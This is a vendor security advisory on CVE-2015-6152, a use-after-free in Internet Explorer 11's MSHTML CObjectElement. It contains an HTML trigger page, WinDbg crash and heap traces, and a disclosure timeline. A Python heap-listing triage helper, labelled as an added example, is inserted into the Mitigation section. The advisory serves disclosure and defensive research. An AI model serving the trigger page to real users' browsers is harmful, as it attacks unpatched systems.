Blue Frost Security GmbH
https://www.bluefrostsecurity.de/
research(at)bluefrostsecurity.de

BFS-SA-2015-003
10-December-2015
________________________________________________________________________________

Vendor:            Microsoft, http://www.microsoft.com
Affected Products: Internet Explorer
Affected Version:  IE 11
Vulnerability:     MSHTML!CObjectElement Use-After-Free Vulnerability
CVE ID:            CVE-2015-6152
________________________________________________________________________________

I. Impact

This vulnerability allows the execution of arbitrary code on vulnerable
installations of Microsoft Internet Explorer. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page or
open a malicious file.
________________________________________________________________________________

II. Vulnerability Details

Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in
the MSHTML!CTreeNode::ComputeFormatsHelper function. The analysis was performed
on Internet Explorer 11 running on Windows 7 SP1 (x64).

The following HTML page can be used to reproduce the issue:

<!DOCTYPE HTML>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<style>
small{
  -ms-block-progression: lr;
  -ms-filter: "vv";
}
</style>
<script>
function trigger() {
  document.execCommand("JustifyLeft");
}
</script>
<nolayer>blue<small>frost</small>
<applet><tt>security</applet>
<script>trigger();</script>
</html>

With page heap enabled and the Memory Protect feature turned off, visiting
that page results in the following crash:

(2d4.830): Access violation - code c0000005 (!!! second chance !!!)
eax=09b09e90 ebx=125b4e60 ecx=00000000 edx=6e9fedf0 esi=0f552fa0 edi=0f552fa0
eip=6dfcc19b esp=097fb520 ebp=097fc1f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!CTreeNode::ComputeFormatsHelper+0x53:
6dfcc19b f7402400000300  test    dword ptr [eax+24h],30000h ds:002b:09b09eb4=????????
0:007> !heap -p -a @eax
    address 09b09e90 found in
    _DPH_HEAP_ROOT @ 9b01000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    9b01f04:          9b09000             2000
    748090b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77e61b1c ntdll!RtlDebugFreeHeap+0x0000002f
    77e1ae8a ntdll!RtlpFreeHeap+0x0000005d
    77dc2b65 ntdll!RtlFreeHeap+0x00000142
    758814ad kernel32!HeapFree+0x00000014
    6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122
    6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x00000023
    6dfce0db MSHTML!CElement::PrivateRelease+0x0000027e
    6d98953d MSHTML!CObjectElement::DeferredFallback+0x0000033d
    6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b
    6d95577e MSHTML!GlobalWndProc+0x0000012e
    770762fa user32!InternalCallWinProc+0x00000023
    77076d3a user32!UserCallWinProcCheckWow+0x00000109
    770777c4 user32!DispatchMessageWorker+0x000003bc
    7707788a user32!DispatchMessageW+0x0000000f
    6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
    6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7
    76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067
    747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
    7588336a kernel32!BaseThreadInitThunk+0x0000000e
    77dc9882 ntdll!__RtlUserThreadStart+0x00000070
    77dc9855 ntdll!_RtlUserThreadStart+0x0000001b

We can see that a freed CObjectElement object is accessed in the
MSHTML!CTreeNode::ComputeFormatsHelper function. If we take a look at the
memory just before the CObjectElement destructor is called, we can see where
the object was initially allocated.
0:007> bu MSHTML!CObjectElement::~CObjectElement
0:007> g
Breakpoint 0 hit
eax=6daf6b10 ebx=00000000 ecx=0980de90 edx=0f834bb0 esi=0980de90 edi=094bc324
eip=6dc4658f esp=094bc310 ebp=094bc318 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000287
MSHTML!CObjectElement::~CObjectElement:

0:007> !heap -p -a poi(@esp+4)
    address 09b09e90 found in
    _DPH_HEAP_ROOT @ 9b01000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                    9b01f04:          9b09e90              170 -          9b09000             2000
          MSHTML!CObjectElement::`vftable'
    74808e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77e6134e ntdll!RtlDebugAllocateHeap+0x00000030
    77e1b16e ntdll!RtlpAllocateHeap+0x000000c4
    77dc2fe3 ntdll!RtlAllocateHeap+0x0000023a
    6daf6a27 MSHTML!CObjectElement::CreateElement+0x00000017
    6e0423a4 MSHTML!CHtmParse::ParseBeginTag+0x000000b8
    6df17172 MSHTML!CHtmParse::ParseToken+0x00000096
    6df16a0f MSHTML!CHtmPost::ProcessTokens+0x000004c7
    6dd8341b MSHTML!CHtmPost::Exec+0x00000207
    6da308a8 MSHTML!CHtmPost::Run+0x0000003d
    6da3080e MSHTML!PostManExecute+0x00000061
    6da2727c MSHTML!PostManResume+0x0000007b
    6da971f0 MSHTML!CDwnChan::OnMethodCall+0x0000002f
    6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b
    6d95577e MSHTML!GlobalWndProc+0x0000012e
    770762fa user32!InternalCallWinProc+0x00000023
    77076d3a user32!UserCallWinProcCheckWow+0x00000109
    770777c4 user32!DispatchMessageWorker+0x000003bc
    7707788a user32!DispatchMessageW+0x0000000f
    6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
    6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7
    76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067
    747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
    7588336a kernel32!BaseThreadInitThunk+0x0000000e
    77dc9882 ntdll!__RtlUserThreadStart+0x00000070
    77dc9855 ntdll!_RtlUserThreadStart+0x0000001b
________________________________________________________________________________

III. Mitigation

The issue was fixed in MS15-124, which should be installed to resolve the
issue.
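From the triage side, the two "!heap -p -a" listings in section II are what a crash-analysis pipeline keys on: a block reported as "free-ed" at the faulting address is the page-heap signature of a use-after-free, and the first MSHTML frame below the allocator wrappers names the object that was freed. The following Python helper is an added example, not part of the original advisory, that parses listings of that shape; the sample text is constructed from the free-ed listing above with its frames truncated.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: WinDbg "!heap -p -a" output under page heap, shaped
# like the free-ed listing in section II (frames truncated).
FREE_LISTING = """\
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                9b01f04:          9b09000             2000
    748090b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77e61b1c ntdll!RtlDebugFreeHeap+0x0000002f
    6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122
    6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x00000023
    6dfce0db MSHTML!CElement::PrivateRelease+0x0000027e
    6d98953d MSHTML!CObjectElement::DeferredFallback+0x0000033d
"""

@dataclass
class HeapBlock:
    address: int
    state: str                    # "free-ed" or "busy"
    user_size: Optional[int]      # only reported for busy blocks
    stack: list = field(default_factory=list)   # symbolised frames, top first

_FRAME = re.compile(r"^\s*[0-9a-fA-F]{8}\s+(.+?)\s*$")   # "<addr> mod!sym+off"
_BLOCK = re.compile(r"^\s*[0-9a-fA-F]+:\s+(.*)$")        # "<block>: sizes..."

def parse_heap_listing(text: str) -> HeapBlock:
    """Parse one '!heap -p -a <addr>' listing into a HeapBlock."""
    addr = re.search(r"address\s+([0-9a-fA-F]+)\s+found in", text)
    state = re.search(r"in\s+(free-ed|busy)\s+allocation", text)
    if not addr or not state:
        raise ValueError("not a page-heap block listing")
    block = HeapBlock(int(addr.group(1), 16), state.group(1), None)
    for line in text.splitlines():
        if (m := _BLOCK.match(line)) and block.state == "busy":
            # busy block line reads: UserAddr UserSize - VirtAddr VirtSize
            block.user_size = int(m.group(1).split()[1], 16)
        elif m := _FRAME.match(line):
            block.stack.append(m.group(1))
    return block

def triage(block: HeapBlock, module: str = "MSHTML") -> tuple:
    """Classify the faulting access and name the module frame that freed
    (or allocated) the block. Allocator and MemoryProtection wrapper frames
    are skipped so the answer is the object's destructor or factory."""
    verdict = "use-after-free" if block.state == "free-ed" else "live-object"
    owner = next((f.split("+")[0] for f in block.stack
                  if f.startswith(module + "!") and "MemoryProtection" not in f), None)
    return verdict, owner
```

Run against the free-ed listing it reports a use-after-free owned by MSHTML!CObjectElement::`vector deleting destructor'; against the busy listing from the breakpoint it reports a live block created by MSHTML!CObjectElement::CreateElement.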
________________________________________________________________________________

IV. Disclosure Timeline

- 2015-08-04 Vulnerability reported to secure@xxxxxxxxxxxxx
- 2015-09-24 Microsoft confirms that they successfully reproduced the issue
- 2015-12-08 Microsoft resolves issue in MS15-124
________________________________________________________________________________

Credit: Bug found by Moritz Jodeit of Blue Frost Security GmbH.
________________________________________________________________________________

Unaltered electronic reproduction of this advisory is permitted. For all other
reproduction or publication, in printing or otherwise, contact
research@xxxxxxxxxxxxxxxxxxxx for permission.

Use of the advisory constitutes acceptance for use in an "as is" condition.
All warranties are excluded. In no event shall Blue Frost Security be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if Blue Frost
Security has been advised of the possibility of such damages.

Copyright 2015 Blue Frost Security GmbH. All rights reserved. Terms of use
apply.